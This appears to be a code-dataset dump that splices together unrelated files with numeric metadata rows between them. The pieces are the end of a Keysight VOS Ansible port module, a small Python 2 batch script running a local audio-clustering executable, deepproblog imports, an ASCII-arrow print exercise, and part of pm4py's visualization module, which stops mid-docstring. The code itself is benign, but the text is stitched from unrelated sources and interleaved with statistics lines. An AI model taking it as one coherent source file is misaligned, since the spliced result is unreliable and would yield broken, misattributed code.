choices: ['UNIVERSAL', 'LOCAL', 'ANY']
mac_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
mac_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
mpls_label:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
is_capture_mpls_label:
description:
- The is_capture_mpls_label property should be set to true only when creating an MPLS label trigger criteria for a Capture Resource.
type: bool
label_level:
description:
- The label_level property is required only when creating an MPLS label trigger criteria for a Capture Resource.
type: integer
value:
required: true
type: integer
outer_tpid:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: integer
raw_custom:
description:
- List of items described below.
type: list
tcp_control:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: string
vlan:
description:
- List of items described below.
type: list
suboptions:
priority:
type: string
vlan_id:
type: integer
vntag:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: integer
vxlan_vni:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
required: true
type: integer
filter_match_count_unit:
description:
- Available on all platforms.
type: string
choices: ['BYTES', 'PACKETS']
filter_mode:
description:
- Available on all platforms.
type: string
choices: ['PASS_ALL', 'DISABLE', 'PBC_UNMATCHED', 'PASS_BY_CRITERIA', 'DENY_BY_CRITERIA', 'DBC_MATCHED', 'EXCLUDE_BY_CRITERIA']
filtering_direction:
description:
- Available on all platforms.
type: string
choices: ['EGRESS', 'INGRESS']
filtering_options:
description:
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, Vision E10S.
type: dict
suboptions:
optimize_connected_df_rules:
description:
- The optimize_connected_df_rules property defaults to true.
required: true
type: bool
force_link_up:
description:
- Available on all platforms.
type: string
choices: ['DISABLED', 'NOT_SUPPORTED', 'MIXED', 'ENABLED']
forward_error_correction_settings:
description:
- Available on all platforms.
type: dict
suboptions:
enabled:
required: true
type: bool
fec_type:
required: true
type: string
choices: ['FC_FEC', 'RS_FEC']
geneve_strip_settings:
description:
- Available on Vision X Series.
type: dict
suboptions:
enabled:
type: bool
port_mode:
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
icon_type:
description:
- Available on all platforms.
type: string
choices: ['TAP', 'INLINE_BYPASS_PORT_SFP', 'LFD', 'INTERCONNECT', 'QSFP_PLUS', 'LOOPBACK_PORT_SFP', 'INLINE_BYPASS_PORT_CFP', 'BIDIRECTIONAL_PORT_QSFP28', 'INLINE_TOOL_PORT_GROUP', 'RJ45', 'OPENFLOW_PORT_CHANNEL', 'DESKTOP_CRT', 'XFP', 'NETSERVICE_INLINE_BYPASS_PORT_GROUP', 'LOAD_BALANCE', 'BIDIRECTIONAL_PORT_CFP', 'DUAL_QSFP_PLUS', 'ROUTER', 'INLINE_BYPASS_PORT_QSFP_PLUS', 'BIDIRECTIONAL_PORT_SFP', 'INLINE_TOOL_PORT_SFP', 'TOWER', 'WRENCH', 'LAPTOP', 'NETFLOW_INTERCONNECT', 'SIMPLEX_PORT_QSFP_PLUS', 'GTP_LOAD_BALANCE', 'MULTI_SERVICES_SWITCH', 'LAYER_3_SWITCH', 'PHONE', 'LOOPBACK_PORT_QSFP_PLUS', 'NETSERVICE_INLINE_TOOL_PORT_GROUP', 'HA_FABRIC_SFP', 'DESKTOP_LCD', 'SIMPLEX_PORT_SFP_PLUS', 'CFP', 'LOOPBACK_PORT_GROUP', 'LOOPBACK_PORT_QSFP28', 'INLINE_BYPASS_PORT_GROUP', 'SERVER', 'CUSTOM', 'QSFP28', 'AGGREGATION_PORT', 'SFP', 'INLINE_TOOL_PORT_CFP', 'MAGNIFYING_GLASS', 'WORKGROUP_SWITCH', 'CX4', 'BIDIRECTIONAL_PORT_QSFP_PLUS', 'SFP_PLUS', 'INLINE_TOOL_PORT_QSFP_PLUS', 'BIDI_INTERCONNECT', 'RACK', 'NETSERVICE_PASSIVE_DECRYPTED', 'HA_FABRIC_QSFP_PLUS']
ignore_pause_frames:
description:
- Enables or disables the flag that indicates whether the port is to ignore pause frames.
- Available on all platforms.
type: bool
inline_bypass_connector_id:
description:
- Available on TradeVision Series, E100 Series, E40 Series, Vision X Series, Vision E10S.
type: integer
inline_tool_connector_id:
description:
- Available on TradeVision Series, E100 Series, E40 Series, Vision X Series, Vision E10S.
type: integer
keywords:
description:
- The list of keywords used by the filter.
- List of items described below.
- A lowercase version of the value, like port for PORT or Port.
- Available on all platforms.
type: list
link_settings:
description:
- Sets the requested port link settings.
- Available on all platforms.
type: string
choices: ['10M_HALF', '25G_FULL', '10M_FULL', 'G20_FULL', '100M_HALF', 'G42_FULL', '1G_FULL', '10G_FULL', '100M_FULL', '40G_FULL', '50G_FULL', 'AUTO', '100G_FULL']
link_up_down_trap_enabled:
description:
- Enables the link up/down traps for specific interfaces.
- Available on all platforms.
type: bool
lldp_receive_enabled:
description:
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, Vision E10S.
type: bool
lldp_transmit_enabled:
description:
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, Vision E10S.
type: bool
media_type:
description:
- Available on all platforms.
type: string
choices: ['XFP_10G', 'RXAUI', 'DXAUI', 'QSFP_PLUS_40G', 'CPU_PCIE', 'CFP_100G', 'SFP28', 'COPPER_1G', 'QSFP28', 'SFP_1G', 'G42_HIGIG2', 'CX4_10G', 'SFP_PLUS_10G']
mod_count:
description:
- Available on all platforms.
type: integer
mode:
description:
- Available on all platforms.
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
modify_access_settings:
description:
- Available on all platforms.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
name:
description:
- Sets the optional, user-assigned port name.
- Available on all platforms.
type: string
netstack_tunnel_origination_local_settings:
description:
- Available on E100 Series, E40 Series, Vision Edge OS, Vision X Series.
type: dict
suboptions:
enabled:
required: true
type: bool
l2gre_key:
type: long
vnid:
type: long
netstack_tunnel_origination_remote_settings:
description:
- Available on E100 Series, E40 Series, Vision Edge OS, Vision X Series.
type: dict
suboptions:
remote_ip_address:
required: true
type: string
remote_mac_address:
type: dict
suboptions:
mac_address:
required: true
type: string
netstack_tunnel_termination_settings:
description:
- Available on E100 Series, E40 Series, Vision Edge OS, Vision X Series.
type: dict
suboptions:
enabled:
required: true
type: bool
ip_version:
type: string or integer
l2gre_key:
type: long
vnid:
type: long
network_interface_settings:
description:
- Available on all platforms.
type: dict
suboptions:
arp_reply_enabled:
type: bool
default_gateway:
type: string
icmp_reply_enabled:
type: bool
ip_address:
type: string
ip_settings_enabled:
required: true
type: bool
ip_version:
type: string or integer
subnet_mask:
type: string
vlan_enabled:
required: true
type: bool
nextgen_gsc_tpg_config:
description:
- Available on all platforms.
type: dict
suboptions:
enable_session_thresholds:
required: true
type: bool
non_session_tpg:
required: true
type: bool
session_thresholds:
required: true
type: integer
utilization_thresholds:
required: true
type: integer
packet_length_trailer_settings:
description:
- Available on all platforms.
type: dict
suboptions:
adjust_length:
description:
- The adjust_length property defaults to false. It must be set to true if the length.
type: bool
enabled:
description:
- The enabled property defaults to false.
required: true
type: bool
port_mode:
description:
- The port_mode may be set to either NETWORK or TOOL. It defaults to null and will be set based on a network or tool ports mode. For bidirectional ports, it must be set to either NETWORK or TOOL.
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
pppoe_strip_settings:
description:
- Available on 7300 Series, Vision X Series.
type: dict
suboptions:
enabled:
description:
- The enabled property defaults to false.
required: true
type: bool
port_mode:
description:
- The port_mode property may be set to either NETWORK or TOOL. It defaults to null and will be set based on a network or tool ports mode. For bidirectional ports, it must be set to either NETWORK or TOOL.
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
resource_access_settings:
description:
- Available on 7300 Series, TradeVision Series, Vision X Series, Vision E10S, F400 Series.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
snmp_tag:
description:
- Sets the tag used by the SNMP component for a port.
- Available on all platforms.
type: string
std_port_tagging_settings:
description:
- Available on all platforms.
type: dict
suboptions:
enabled:
description:
- The enabled property defaults to false. When disabling this setting, vlan_id is an optional field, but vlan_id is required when setting it to enable.
required: true
type: bool
vlan_id:
description:
- For information on the default values used for vlan_id see the User Guide.
type: integer
std_strip_by_vlan_settings:
description:
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, Vision E10S.
type: dict
suboptions:
enabled:
description:
- The enabled property defaults to false.
required: true
type: bool
strip_mode:
description:
- This is an egress-only feature, so the ports mode must support egress traffic. This setting will be applied to the egress side regardless of the value in the strip_mode property, so this property may safely be ignored.
type: string
choices: ['EGRESS', 'INGRESS', 'INGRESS_AGGREGATION_SWITCH_FABRIC', 'BOTH']
vlan_id:
description:
- The vlan_id property is optional (ignored) when disabling this setting but required when enabling.
type: integer
std_vlan_strip_settings:
description:
- Available on all platforms.
type: dict
suboptions:
egress_count:
description:
- Egress count is the maximum number of VLAN tags to strip in the egress direction.
type: integer
enabled:
description:
- Will be true if the VLAN stripping feature is enabled, false otherwise.
required: true
type: bool
ingress_count:
description:
- Ingress count is the maximum number of VLAN tags to strip in the ingress direction.
type: integer
strip_mode:
description:
- Stripping mode. This is either INGRESS, EGRESS, or BOTH.
type: string
choices: ['EGRESS', 'INGRESS', 'INGRESS_AGGREGATION_SWITCH_FABRIC', 'BOTH']
timestamp_translation_settings:
description:
- Available on Vision X Series.
type: dict
suboptions:
enabled:
description:
- The enabled property defaults to false.
required: true
type: bool
port_mode:
description:
- The port_mode defaults to null but will be set based on the ports mode.
type: string
choices: ['LOOPBACK', 'NETWORK', 'BYPASS_BIDIRECTIONAL', 'HA_FABRIC', 'BIDIRECTIONAL', 'TOOL', 'SIMPLEX', 'INLINE_TOOL_BIDIRECTIONAL']
ts_arista_48_64b_l2_insertion_enabled:
description:
- Arista 48/64b L2 Insertion (7280R, 7500R).
required: true
type: bool
ts_arista_src_mac_enabled:
description:
- Arista MAC Substitution (7280R, 7500R).
required: true
type: bool
tx_light_status:
description:
- Available on all platforms.
type: string
choices: ['NOT_SUPPORTED', 'MIXED', 'OFF', 'ON']
view_access_settings:
description:
- Available on all platforms.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
author:
- Keysight
'''
EXAMPLES = '''
- name: Change port mode to TOOL
vos_ports:
settings:
enabled: true
mode: TOOL
name: P04
- name: Change port mode to BIDIRECTIONAL
vos_ports:
settings:
enabled: true
mode: BIDIRECTIONAL
name: P03
- name: Configure filter mode to Pass By Criteria for a NETWORK port
vos_ports:
settings:
enabled: true
filter_criteria:
ip_protocol:
value: '1'
ipv4_src:
addr:
- 192.168.100.0/24
logical_operation: AND
mac_src:
addr:
- 00-01-02-*-*-*
filter_mode: PASS_BY_CRITERIA
mode: NETWORK
name: P04
- name: Configure filter mode to Pass By Criteria for a TOOL port
vos_ports:
settings:
enabled: true
filter_criteria:
inner_vlan:
priority: '000'
vlan_id: '4090'
ip_protocol:
value: '118'
logical_operation: AND
filter_mode: PASS_BY_CRITERIA
mode: TOOL
name: P03
- name: Enable Standard VLAN stripping for a NETWORK port
vos_ports:
settings:
mode: TOOL
name: P04
std_vlan_strip_settings:
egress_count: 2
enabled: true
ingress_count: 0
strip_mode: EGRESS
- name: Enable Standard VLAN stripping for a BIDIRECTIONAL port
vos_ports:
settings:
mode: BIDIRECTIONAL
name: P03
std_vlan_strip_settings:
egress_count: 2
enabled: true
ingress_count: 0
strip_mode: EGRESS
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.vos.resource_configurator import ResourceConfigurator
def run_module():
module = AnsibleModule(argument_spec={'port': dict(type='str'), 'delete': dict(type='bool'),
'software_version': dict(type='str'), 'settings': dict(type='dict')})
connection = Connection(module._socket_path)
configurator = ResourceConfigurator(connection=connection, module=module)
try:
from inspect import signature
# fetch using Web API the python dictionary representing the argument_spec
properties = configurator.connection.get_python_representation_of_object('ports', 'ports')
module.argument_spec['settings'] = {'type': 'dict', 'options': properties}
s = signature(module._check_arguments)
if 'check_invalid_arguments' in s.parameters:
module._check_arguments(check_invalid_arguments=False)
else:
module._check_arguments()
except:
pass
result = dict(
changed=False,
messages=[]
)
try:
configurator.clear_payload(module.params)
configurator.module = module
if 'port' in module.params:
configurator.get_target('port', '/ports')
elif 'settings' in module.params and 'name' in module.params['settings']:
configurator.get_target('name', '/ports')
output = configurator.configure_ports()
for each in output:
if each['status_code'] not in [200, 202, 401]:
result['failed'] = True
elif each['content'] != 'NOT CHANGED':
result['changed'] = True
result['messages'].append(each['content'])
module.exit_json(**result)
except Exception as e:
module.fail_json(msg=e, **result)
def main():
run_module()
if __name__ == '__main__':
main()
| 48.993252 | 1,082 | 0.397087 | 6,170 | 79,859 | 5.026094 | 0.100486 | 0.027474 | 0.050015 | 0.090935 | 0.764632 | 0.747251 | 0.724614 | 0.707201 | 0.690368 | 0.674148 | 0 | 0.036968 | 0.559311 | 79,859 | 1,629 | 1,083 | 49.023327 | 0.844202 | 0.015765 | 0 | 0.838422 | 0 | 0.026081 | 0.976715 | 0.039432 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001272 | false | 0.008906 | 0.002545 | 0 | 0.003817 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f9ce5a6b8fc4701f96eb813b59bd63588836ef4d | 467 | py | Python | marsyas-vamp/marsyas/scripts/Python/batchPan.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | marsyas-vamp/marsyas/scripts/Python/batchPan.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | marsyas-vamp/marsyas/scripts/Python/batchPan.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | import os
from glob import glob
beginCommand = "peakClustering.exe -a -s 2 -c 3 -k 2 -i 0_300 -o c:\output\\bass -p 1_-1_0.05_-1 "
for name in glob("..\..\..\jazz\*.wav"):
command = beginCommand+name
print command
os.system(command)
beginCommand = "peakClustering.exe -a -s 2 -c 3 -k 2 -i 250_2500 -o c:\output\up -p 1_-1_0.2_-1 "
for name in glob("..\..\..\jazz\*.wav"):
command = beginCommand+name
print command
os.system(command)
| 25.944444 | 99 | 0.62955 | 80 | 467 | 3.575 | 0.4125 | 0.199301 | 0.202797 | 0.20979 | 0.755245 | 0.755245 | 0.755245 | 0.755245 | 0.755245 | 0.755245 | 0 | 0.075067 | 0.201285 | 467 | 17 | 100 | 27.470588 | 0.691689 | 0 | 0 | 0.666667 | 0 | 0.166667 | 0.442222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f9dc4a9df20cdee9619fe8c467154891757e8946 | 172 | py | Python | src/deepproblog/engines/__init__.py | vossenwout/gtadeepproblog | 65509b740518af422b96e84ef10716e0ac246e75 | [
"Apache-2.0"
] | 54 | 2021-06-23T08:03:23.000Z | 2022-03-10T01:02:43.000Z | src/deepproblog/engines/__init__.py | vossenwout/gtadeepproblog | 65509b740518af422b96e84ef10716e0ac246e75 | [
"Apache-2.0"
] | 2 | 2021-06-30T23:48:25.000Z | 2022-03-18T10:45:05.000Z | src/deepproblog/engines/__init__.py | vossenwout/gtadeepproblog | 65509b740518af422b96e84ef10716e0ac246e75 | [
"Apache-2.0"
] | 12 | 2021-06-30T10:47:52.000Z | 2022-03-09T23:51:48.000Z | from deepproblog.engines.approximate_engine import ApproximateEngine
from deepproblog.engines.engine import Engine
from deepproblog.engines.exact_engine import ExactEngine
| 43 | 68 | 0.895349 | 20 | 172 | 7.6 | 0.45 | 0.296053 | 0.434211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 172 | 3 | 69 | 57.333333 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fb068af71b5e3f11b75c032d52ccd7c917957306 | 486 | py | Python | practice_py/Netacad_lab_printing_arrow.py | RootProgrammer/Python | d3308af735934d40df5ca2b115cf1deffcae5fac | [
"MIT"
] | 1 | 2021-04-18T08:14:41.000Z | 2021-04-18T08:14:41.000Z | practice_py/Netacad_lab_printing_arrow.py | RootProgrammer/Python | d3308af735934d40df5ca2b115cf1deffcae5fac | [
"MIT"
] | null | null | null | practice_py/Netacad_lab_printing_arrow.py | RootProgrammer/Python | d3308af735934d40df5ca2b115cf1deffcae5fac | [
"MIT"
] | null | null | null | print(" *\t\t"*2)
print(" * *\t\t"*2)
print(" * *\t\t"*2)
print(" * *\t"*2)
print("*** ***\t"*2)
print(" * *\t\t"*2)
print(" * *\t\t"*2)
print(" *****\t\t"*2)
print("""
*
* *
* *
* *
* *
* *
* *
* *
* *
****** ******
* *
* *
* *
* *
* *
*********
""")
| 17.357143 | 23 | 0.13786 | 31 | 486 | 2.16129 | 0.096774 | 0.716418 | 0.835821 | 0.835821 | 1 | 1 | 1 | 0.910448 | 0.910448 | 0.910448 | 0 | 0.040201 | 0.590535 | 486 | 27 | 24 | 18 | 0.296482 | 0 | 0 | 0.653846 | 0 | 0 | 0.75817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.346154 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
fb263c4d6927206d1611fe0e870078aaf08b69e6 | 28,674 | py | Python | ws2122-lspm/Lib/site-packages/pm4py/vis.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-19T04:02:46.000Z | 2022-01-19T04:02:46.000Z | ws2122-lspm/Lib/site-packages/pm4py/vis.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2021-11-19T07:21:48.000Z | 2021-11-19T07:21:48.000Z | ws2122-lspm/Lib/site-packages/pm4py/vis.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-14T17:15:38.000Z | 2022-01-14T17:15:38.000Z | '''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
import os
from copy import copy
from typing import Optional
from typing import Union, List, Dict, Any
import pandas as pd
from pm4py.objects.bpmn.obj import BPMN
from pm4py.objects.heuristics_net.obj import HeuristicsNet
from pm4py.objects.log.obj import EventLog
from pm4py.objects.petri_net.obj import PetriNet, Marking
from pm4py.objects.process_tree.obj import ProcessTree
from pm4py.util.pandas_utils import check_is_pandas_dataframe, check_pandas_dataframe_columns
from pm4py.utils import get_properties, general_checks_classical_event_log
def view_petri_net(petri_net: PetriNet, initial_marking: Optional[Marking] = None,
final_marking: Optional[Marking] = None, format: str = "png"):
"""
Views a (composite) Petri net
Parameters
-------------
petri_net
Petri net
initial_marking
Initial marking
final marking
Final marking
format
Format of the output picture (default: png)
"""
from pm4py.visualization.petri_net import visualizer as pn_visualizer
gviz = pn_visualizer.apply(petri_net, initial_marking, final_marking,
parameters={pn_visualizer.Variants.WO_DECORATION.value.Parameters.FORMAT: format})
pn_visualizer.view(gviz)
def save_vis_petri_net(petri_net: PetriNet, initial_marking: Marking, final_marking: Marking, file_path: str):
"""
Saves a Petri net visualization to a file
Parameters
--------------
petri_net
Petri net
initial_marking
Initial marking
final marking
Final marking
file_path
Destination path
"""
format = os.path.splitext(file_path)[1][1:]
from pm4py.visualization.petri_net import visualizer as pn_visualizer
gviz = pn_visualizer.apply(petri_net, initial_marking, final_marking,
parameters={pn_visualizer.Variants.WO_DECORATION.value.Parameters.FORMAT: format})
pn_visualizer.save(gviz, file_path)
def view_performance_dfg(dfg: dict, start_activities: dict, end_activities: dict, format: str = "png",
aggregation_measure="mean"):
"""
Views a performance DFG
Parameters
----------------
dfg
DFG object
start_activities
Start activities
end_activities
End activities
format
Format of the output picture (default: png)
aggregation_measure
Aggregation measure (default: mean): mean, median, min, max, sum, stdev
"""
from pm4py.visualization.dfg import visualizer as dfg_visualizer
from pm4py.visualization.dfg.variants import performance as dfg_perf_visualizer
dfg_parameters = dfg_perf_visualizer.Parameters
parameters = {}
parameters[dfg_parameters.FORMAT] = format
parameters[dfg_parameters.START_ACTIVITIES] = start_activities
parameters[dfg_parameters.END_ACTIVITIES] = end_activities
parameters[dfg_parameters.AGGREGATION_MEASURE] = aggregation_measure
gviz = dfg_perf_visualizer.apply(dfg, parameters=parameters)
dfg_visualizer.view(gviz)
def save_vis_performance_dfg(dfg: dict, start_activities: dict, end_activities: dict, file_path: str,
aggregation_measure="mean"):
"""
Saves the visualization of a performance DFG
Parameters
----------------
dfg
DFG object
start_activities
Start activities
end_activities
End activities
file_path
Destination path
aggregation_measure
Aggregation measure (default: mean): mean, median, min, max, sum, stdev
"""
format = os.path.splitext(file_path)[1][1:]
from pm4py.visualization.dfg import visualizer as dfg_visualizer
from pm4py.visualization.dfg.variants import performance as dfg_perf_visualizer
dfg_parameters = dfg_perf_visualizer.Parameters
parameters = {}
parameters[dfg_parameters.FORMAT] = format
parameters[dfg_parameters.START_ACTIVITIES] = start_activities
parameters[dfg_parameters.END_ACTIVITIES] = end_activities
parameters[dfg_parameters.AGGREGATION_MEASURE] = aggregation_measure
gviz = dfg_perf_visualizer.apply(dfg, parameters=parameters)
dfg_visualizer.save(gviz, file_path)
def view_dfg(dfg: dict, start_activities: dict, end_activities: dict, format: str = "png",
log: Optional[EventLog] = None):
"""
Views a (composite) DFG
Parameters
-------------
dfg
DFG object
start_activities
Start activities
end_activities
End activities
format
Format of the output picture (default: png)
"""
from pm4py.visualization.dfg import visualizer as dfg_visualizer
dfg_parameters = dfg_visualizer.Variants.FREQUENCY.value.Parameters
parameters = get_properties(log)
parameters[dfg_parameters.FORMAT] = format
parameters[dfg_parameters.START_ACTIVITIES] = start_activities
parameters[dfg_parameters.END_ACTIVITIES] = end_activities
gviz = dfg_visualizer.apply(dfg, log=log, variant=dfg_visualizer.Variants.FREQUENCY,
parameters=parameters)
dfg_visualizer.view(gviz)
def save_vis_dfg(dfg: dict, start_activities: dict, end_activities: dict, file_path: str,
log: Optional[EventLog] = None):
"""
Saves a DFG visualization to a file
Parameters
--------------
dfg
DFG object
start_activities
Start activities
end_activities
End activities
file_path
Destination path
"""
if log is not None:
general_checks_classical_event_log(log)
format = os.path.splitext(file_path)[1][1:]
from pm4py.visualization.dfg import visualizer as dfg_visualizer
dfg_parameters = dfg_visualizer.Variants.FREQUENCY.value.Parameters
parameters = get_properties(log)
parameters[dfg_parameters.FORMAT] = format
parameters[dfg_parameters.START_ACTIVITIES] = start_activities
parameters[dfg_parameters.END_ACTIVITIES] = end_activities
gviz = dfg_visualizer.apply(dfg, log=log, variant=dfg_visualizer.Variants.FREQUENCY,
parameters=parameters)
dfg_visualizer.save(gviz, file_path)
def view_process_tree(tree: ProcessTree, format: str = "png"):
"""
Views a process tree
Parameters
---------------
tree
Process tree
format
Format of the visualization (default: png)
"""
from pm4py.visualization.process_tree import visualizer as pt_visualizer
parameters = pt_visualizer.Variants.WO_DECORATION.value.Parameters
gviz = pt_visualizer.apply(tree, parameters={parameters.FORMAT: format})
pt_visualizer.view(gviz)
def save_vis_process_tree(tree: ProcessTree, file_path: str):
"""
Saves the visualization of a process tree
Parameters
---------------
tree
Process tree
file_path
Destination path
"""
format = os.path.splitext(file_path)[1][1:]
from pm4py.visualization.process_tree import visualizer as pt_visualizer
parameters = pt_visualizer.Variants.WO_DECORATION.value.Parameters
gviz = pt_visualizer.apply(tree, parameters={parameters.FORMAT: format})
pt_visualizer.save(gviz, file_path)
def save_vis_bpmn(bpmn_graph: BPMN, file_path: str):
"""
Saves the visualization of a BPMN graph
Parameters
--------------
bpmn_graph
BPMN graph
file_path
Destination path
"""
format = os.path.splitext(file_path)[1][1:]
from pm4py.visualization.bpmn import visualizer as bpmn_visualizer
parameters = bpmn_visualizer.Variants.CLASSIC.value.Parameters
gviz = bpmn_visualizer.apply(bpmn_graph, parameters={parameters.FORMAT: format})
bpmn_visualizer.save(gviz, file_path)
def view_bpmn(bpmn_graph: BPMN, format: str = "png"):
"""
Views a BPMN graph
Parameters
---------------
bpmn_graph
BPMN graph
format
Format of the visualization (default: png)
"""
from pm4py.visualization.bpmn import visualizer as bpmn_visualizer
parameters = bpmn_visualizer.Variants.CLASSIC.value.Parameters
gviz = bpmn_visualizer.apply(bpmn_graph, parameters={parameters.FORMAT: format})
bpmn_visualizer.view(gviz)
def view_heuristics_net(heu_net: HeuristicsNet, format: str = "png"):
"""
Views an heuristics net
Parameters
--------------
heu_net
Heuristics net
format
Format of the visualization (default: png)
"""
from pm4py.visualization.heuristics_net import visualizer as hn_visualizer
parameters = hn_visualizer.Variants.PYDOTPLUS.value.Parameters
gviz = hn_visualizer.apply(heu_net, parameters={parameters.FORMAT: format})
hn_visualizer.view(gviz)
def save_vis_heuristics_net(heu_net: HeuristicsNet, file_path: str):
"""
Saves the visualization of an heuristics net
Parameters
--------------
heu_net
Heuristics nte
file_path
Destination path
"""
format = os.path.splitext(file_path)[1][1:]
from pm4py.visualization.heuristics_net import visualizer as hn_visualizer
parameters = hn_visualizer.Variants.PYDOTPLUS.value.Parameters
gviz = hn_visualizer.apply(heu_net, parameters={parameters.FORMAT: format})
hn_visualizer.save(gviz, file_path)
def __dotted_attribute_selection(log, attributes):
"""
Default attribute selection for the dotted chart
Parameters
-----------------
log
Event log
Returns
-----------------
attributes
List of attributes
"""
general_checks_classical_event_log(log)
if attributes is None:
from pm4py.util import xes_constants
from pm4py.objects.log.util import sorting
from pm4py.convert import convert_to_event_log
log = convert_to_event_log(log)
log = sorting.sort_timestamp(log, xes_constants.DEFAULT_TIMESTAMP_KEY)
for index, trace in enumerate(log):
trace.attributes["@@index"] = index
attributes = ["time:timestamp", "case:@@index", "concept:name"]
return log, attributes
def view_dotted_chart(log, format: str = "png", attributes=None):
"""
Displays the dotted chart
Parameters
-----------------
log
Event log
format
Image format
attributes
Attributes that should be used to construct the dotted chart.
If None, the default dotted chart will be shown:
x-axis: time
y-axis: cases (in order of occurrence in the event log)
color: activity
For custom attributes, use a list of attributes
of the form [x-axis attribute, y-axis attribute, color attribute], e.g., ["concept:name", "org:resource", "concept:name"])
"""
general_checks_classical_event_log(log)
log, attributes = __dotted_attribute_selection(log, attributes)
from pm4py.visualization.dotted_chart import visualizer as dotted_chart_visualizer
gviz = dotted_chart_visualizer.apply(log, attributes, parameters={"format": format})
dotted_chart_visualizer.view(gviz)
def save_vis_dotted_chart(log, file_path: str, attributes=None):
"""
Saves the visualization of the dotted chart
Parameters
-----------------
log
Event log
